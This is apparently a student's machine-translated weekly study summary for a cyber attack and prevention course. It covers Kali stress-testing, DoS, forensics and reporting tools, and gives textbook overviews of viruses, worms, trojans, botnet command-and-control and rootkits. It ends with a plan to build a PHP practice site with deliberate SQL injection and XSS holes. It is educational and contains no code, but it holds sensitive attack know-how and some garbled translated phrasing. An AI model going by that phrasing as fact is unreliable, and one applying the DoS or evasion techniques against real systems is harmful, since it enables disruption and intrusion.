20159302 "cyber attack and Prevention" Nineth Week study Summary

I. Video learning content 1. Stress testing

The stress test is to obtain the maximum service level test that the system can provide by determining the bottleneck of a system or the performance points that cannot be received. In layman's terms, stress testing is to take place under what conditions your application's performance will become unacceptable.

The Kali pressure test tool includes four classifications for VoIP stress testing, web stress testing, network stress testing, and wireless stress testing.

1.1 VoIP Stress Test tool: Mainly includes Iaxflood and Inviteflood.

1.2 Web Stress test: Thc-ssl-dos, with the Thc-ssl-dos attack tool, anyone can take a website that provides SSL secure connection to the offline attack method called SSL denial of Service attack (SSL DOS). The German hacker organization "The Hacker's Choice" released Thc-ssl-dos, using known weaknesses in SSL to rapidly consume server resources, unlike traditional DDoS tools, it does not require any broadband and requires only one computer that performs a single attack.

The vulnerability exists in the Protocol's renegotiation process, and renegotiation is used for browser-to-server authentication.

1.3 Network Stress test--dhcpig: Runs out of stress tests on the DHCP resource pool.

1.4 IPv6 Attack Toolkit

1.5 Inundator:ids/ips/waf pressure test tool

1.6 Macof: Can do red attack

1.7 Siege: Is a stress testing and evaluation tool designed for Web developers to assess the affordability of applications under pressure: Multiple concurrent access to a Web site based on configuration, recording the corresponding time of each user's request process, and repeating under a certain number of concurrent accesses.

1.8 T50 Pressure test: T50 Sukhoi PAK FA Mixed Packet Injector (f.k.a.f22 Raptor) is a stress testing tool that is powerful and has unique packet injection tools. T50 supports the *nix system for multiple protocol packet injection, which in fact supports the 15 protocol.

1.9 Wireless Stress test: Includes MSK3 and Reaver.

2. Digital Forensics Tools

Digital Forensics technology applies computer investigation and analysis technology to the determination and acquisition of potential and legal effects of electronic evidence, and they are all aimed at hackers and intrusions, so as to ensure the security of the network. Kali has a wealth of digital forensics tools.

2.1 Peepdf is a PDF file analysis tool written in Python that detects malicious PDF files and is designed to provide security researchers with all the components that may be used in PDF analysis without using 4 or 4 tools to accomplish the same task.

2.2 Anti-Digital forensics chkrootkit:chkrootkit is a tool for finding and detecting rootkit backdoors under a Linux system. Determine if the system is implanted with a rootkit.

2.3 Memory Forensics tool. Volatility is an open source windows, Linux, Mac, and Android memory Forensics tool that is programmed by Python and command-line operations to support various operating systems.

2.4 Forensic Segmentation Tool Binwalk. Binwalk is a firmware analysis tool designed to assist researchers in the non-analysis, extraction and reverse engineering use of firmware. Easy to use, fully automated scripting, and easily extensible with custom signatures, extraction rules and plug-in modules. With Binwalk, a powerful feature is the ability to extract hidden files (or content files) that exist in files (compressed packages) or to parse file formats.

2.5 Forensics Hash Validation toolset: Md5deep is a cross-platform scenario that calculates and compares digest md5,sha-1,sha-256,tiger,whirlpool for hash encrypted information such as MD5.

2.6 Forensics Image toolset: Forensic tools for image files, such as Mmsstat and mmls.

2.7 Digital Forensics Suite: One of the DFF (Digital Forensics framework) is a simple but powerful tool for digitally forensics work, it has a flexible modular system with multiple functions, including: recovery errors or crashes resulting in file loss, evidence research and analysis, etc. DFF provides a powerful architecture and some useful modules. Autopsy, however, provides a browser console.

3. Reporting tools and system services

A complete penetration test, in the end, to complete an elegant report as a summary, the corresponding Kali for security engineers to prepare a report toolset.

3.1 Dradis: is an information-sharing framework (collaboration platform) for improving the efficiency of security detection. Dradis provides a centralized repository of information to mark the work we have done and the next steps.

3.2 Keepnote: Rich Text Format: color fonts, built-in images, hyperlinks (that is, can save the entire Web page picture text and so on full content); tree-type hierarchical organization content; full-text search; synthesis; file attachments; integrated backup and restore; spell check (via Gtkspell); auto Save ; built-in Backup and restore (ZIP file archive).

3.3 Cutycapt Media capture

3.4 Magictree is a penetration tester tool that can help you easily and directly perform data merging, querying, external command execution, and generating reports all data is stored in a tree-shaped structure and is very convenient.

3.5 TrueCrypt: is a free open source encryption software, supporting a variety of operating systems.

3.6 System Service Introduction:

Beef: The start-up and shutdown of the XSS test framework beef;

Dradis: The start and close of the corresponding note sharing service Dradis;

http: The start and shutdown of the corresponding Kali native Web service;

Metasploit: The start-up and shutdown of the corresponding Metasploit service;

Second, the Teaching material content Study 1. Malicious code

Malicious code refers to the set of instructions that enables a computer to perform a malicious goal in accordance with the intent of the attacker. First, malicious code is a set of instructions, and malicious code can be implemented in a variety of ways, such as binary execution files, scripting language code, macro code, or a stream of instructions that are parasitic in other code or boot sectors. Second, the execution goal of malicious code is determined by the writer and satisfies some of their psychological or interest needs. Typical attack targets include, but are not limited to: mere technical ostentation, or mischief, remote control of the attacked host, making it an attacker's puppet host, satisfying its need to implement a springboard attack or further spreading malicious code, stealing private or confidential information, stealing compute, storage, bandwidth resources, denial of service, and vandalism.

Malicious code can be divided into computer viruses, worms, malicious mobile code, Trojan horses, backdoor, zombie programs, kernel suites, etc. depending on how it is executed, how it is propagated, and the impact it has on the attack target. A computer virus is the first malicious code type that appears. Computer virus: A self-replicating code that infects itself by embedding itself in other programs, and the infection process usually requires manual intervention to complete. Worm: A class of self-running malicious code that does not need to embed itself in other host programs. Malicious mobile code: belongs to the category of mobile code, mobile code is a lightweight program that can be downloaded from a remote host and executed locally. Backdoor: A class that can bypass normal security control mechanisms, thus providing attackers with access to a class of malicious code. Trojan Horse: A class of malicious code disguised as useful software, but hiding its malicious targets. Botnet: For malicious purposes, the attacker propagates bots to program a large number of hosts and a network of attacks consisting of a pair of commands and control channels. Zombie Program: A form of malicious code used to build botnets to form a pair of multi-control attack platforms. Kernel Suite: In the user state by replacing or modifying the system key executable file, or in the kernel state by controlling the operating system kernel, to obtain and maintain the highest control of a class of malicious code, also divided into user-state rootkit and kernel rootkit two.

Nomenclature and classification: The anti-virus industry generally uses the "ternary naming" rule to name new samples of malicious code found, where "ternary" refers to the type of malicious code, family name and variant number, the general form is: [Malicious code type.] Malicious code family name [Variant].

Development trend: ① The complexity and destructive power of malicious code ② Malicious code technology is becoming more frequent ③ focus on the shift from computer viruses to worms and kernel-level attack tools.

2. Computer viruses

The concept of computer viruses was first proposed by Fred Cohen in 1983. Our country has the definition of the legal effect of the computer virus: computer virus refers to a set of computer instruction or program code that is inserted in computer program, destroys computer function or data, affects computer use, and can copy itself.

Characteristics of computer viruses: infectious, latent, triggering, destructive, derivative.

Computer virus infection and guidance mechanism: computer viruses need to embed themselves in a host program to run, and the way the infection determines how the computer virus from the host program is guided to run the way, so the virus infection and guidance mechanism is closely related. The potential infection target of a computer virus can be divided into executable files (three ways to infect executables include prefix infection mechanism, suffix infection mechanism and insertion mechanism), boot sector, and data files that support macro directives.

Computer virus transmission mechanism: including mobile storage, e-mail and download, shared directory and so on.

3. Network Worms

is a malicious code that travels autonomously through the network. From the definition of Essence analysis, network worm is a self-replicating code, and spread through the network, usually without human intervention can spread. The worm is precisely because of the definition of rapid and active propagation, which can cause paralysis of the entire Internet, also known as the "Plague of the internet age". The Morris worm of the November 1988 was hailed as the "first Internet worm" due to its widespread popularity and influence. The SQL Slammer worm is the fastest-spreading network worm in history.

Feature: In the network's autonomous transmission, if a code is not spread through the network, then it is not a worm.

Worm composition: The internal components of a worm are similar to some parts of a missile weapon, a warhead used to penetrate a target, a transmission of an engine-driven missile to its target, a target selection algorithm and a scanning engine much like a small gyroscope in a missile, which can guide the missile to discover and point to its target, The payload compartment carries a vicious material that performs a truly destructive attack.

The most common techniques for obtaining access to a target system: Buffer overflow attacks, file share attacks, e-mail propagation, and other common misconfiguration.

Propagation Engine: commonly utilized network transport mechanisms include file Transfer Protocol FTP, small file Transfer Protocol TFTP, Hypertext Transfer Protocol HTTP, Service information block protocol SMB, and raw socket sockets.

4. Backdoor and Trojan

From the definition attribute analysis, the backdoor is the procedure which allows the attacker to bypass the general security control mechanism of the system, can access the channel according to the attacker's own intention, and the Trojan Horse is a kind of program that appears to have some useful or good intentions, but actually conceals some hidden malicious functions.

Access channel of the Backdoor Tool: (1) Local privilege elevation and local account (2) remote execution of a single command (3) remote command line interpreter access (4) remote control GUI (5) unprovoked mouth backdoor. Backdoor tools often take advantage of the system's self-priming function, adding itself to the system restart mechanism. In the Windows platform, the backdoor tool can take advantage of the three main ways of starting a self-launching folder, a registry self-starter, and a scheduled task to achieve a self-priming effect.

The name of a Trojan horse originated in the Trojan War described in Homer's epic. Trojan horse programs can be used for the following purposes: (1) Spoofing the user or system administrator to install a Trojan horse program, so that the trojan through unsuspecting users into the computer system, (2) hidden in the normal program of the computer, disguised as if it appears to belong to the system, So that users and administrators will not be aware of its existence, usually combined with backdoor tools, to become a Trojan backdoor. The common attack techniques for naming camouflage are confusing file extensions, mimicking Windows system files or service naming, and so on. Attacking the software publishing site can allow attackers to trojan the software on the official site, allowing the downloader to install a version of malicious code that threatens tens of thousands or even millions of of users. Code poisoning refers to the application of software vendors in the development and testing software to implant some software-independent program logic, even malicious code.

5. Zombie Network

Botnet is a new type of attack, which is based on the traditional malicious code form such as network worm, Trojan Horse, backdoor tool and so on. A botnet is an attacker who, for malicious purposes, propagates bots to program a large number of hosts and a network of multiple commands and control channels. The basic feature of botnets that are different from other attacks is the use of a one-to-many command and control mechanism, as well as the malicious and network-based network propagation of botnets.

Structure of the botnet: the first IRC botnet is comprised of a botnet controller and a zombie program. The function structure of the zombie program can be divided into the main function module and the auxiliary function module, the main function module includes the command and control module which realizes the botnet definition characteristic and the propagation module which realizes the network propagation characteristic, and includes the Auxiliary function module (by the information stealing module, the host control module, The zombie programs that download the update module and the anti-analysis detection module are more powerful attacking capabilities and better survivability. The command and control module in the main function module is the core of the entire zombie program. Zombie programs can be classified according to the propagation strategy of the automatic propagation of the zombie program and the controlled spread of the two categories of zombie program, and the way bots are spread through the remote attack Software vulnerability propagation, scanning NetBIOS weak password propagation, scanning the backdoor left behind by the malicious code to spread, by sending mail virus transmission, Spread through file system sharing, and so on. The auxiliary function module is a summary of other functions, including information stealing, zombie host control, download and update, and evasion detection and countermeasure analysis, besides the topic function.

Bot control and commands: The basic feature of botnets is the use of a one-to-many command and control mechanism, so understanding the implementation of command and control mechanisms is an essential prerequisite for a deeper understanding of botnet mechanisms. The current mainstream botnet command and control mechanism includes: command and control mechanism based on IRC protocol, command and control mechanism based on HTTP protocol and command and control mechanism based on peer-to-peer protocol. One of the most commonly used communication methods in IRC networks is group chat. Based on the IRC protocol, there are three ways an attacker could publish commands to a controlled zombie program: set a channel theme command, send a PRIVMSG message using a channel or a single zombie program, and send commands via notice messages. The commands that are sent in the IRC botnet can be divided into botnet control commands, spread propagation commands, information stealing commands, host control commands, and download and update commands according to the function modules that the zombie program implements. The host control commands can also be broken down to launch DDoS attacks, set up services, send spam, click Fraud, and more. There are two advantages to using the HTTP protocol to build a botnet command and control mechanism: first, building a control channel using the HTTP protocol allows botnet control traffic to be obliterated in a large amount of Internet web traffic, making the HTTP protocol-based botnet activity more difficult to detect; Using the HTTP protocol to build a control channel generally bypasses the firewall. Both command and control mechanisms based on the IRC protocol and HTTP protocol have centralized control points, which makes the botnet based on client-server architecture easy to be tracked, detected and reversed.

A rootkit is defined as a type of Trojan backdoor tool that allows an attacker to gain access and be hidden from the computer by modifying existing operating system software. Rootkits need to be made up of a multitude of functional components, including a malicious program that replaces the operating system software to hide itself, a backdoor that implements hidden backdoor access, and a variety of assistive tools that allow attackers to adjust the characteristics of those programs that are replaced, in addition, Because a rootkit is usually a malicious program toolkit, it is named "root" + "kit", which is the kit toolkit used to get access to the root backdoor. Depending on the hierarchy of the operating system, rootkits can run on two different levels, namely user mode and kernel mode. A binary replacement program that provides backdoor access, a binary replacement program that hides attackers, a binary program for hiding but not replacing, a few other scattered tools, and an installation script. Windows provides a number of development interfaces for supporting third-party tools to extend the built-in features of Windows. Windows uses the WFP mechanism to prevent operating system critical files from being modified or replaced. User mode Rookit can also use DLL injection and API hook technology to directly add malicious code to the running program's memory space.

Third, the study progress bar

Can keep up with the progress of the course, master the basic stress test, digital forensics and report generation methods, in this section of the study, mastered a certain system stress testing, computer digital forensics, system reporting tools, such as System Application tools. The disadvantage is the weak hands, in the entire experimental process, jam more, but all in the end to solve.

In this week's study encountered the problem: try to use the PHP language to build the site, the site is built on the wampserver, to achieve the normal registration login function, but has not been able to set the SQL injection vulnerability, do not know the specific use of the vulnerability.

Iv. learning goals for the semester

Learn and master the PHP language and use it to build a website that leverages the knowledge learned from network attack, setting SQL injection vulnerabilities and XSS vulnerability settings. Thus the two-way practice of learning content.

Five, next week study schedule

To optimize the site, design pages and other functions. and use it to build SQL injection vulnerabilities.

20159302 "cyber attack and Prevention" Nineth Week study Summary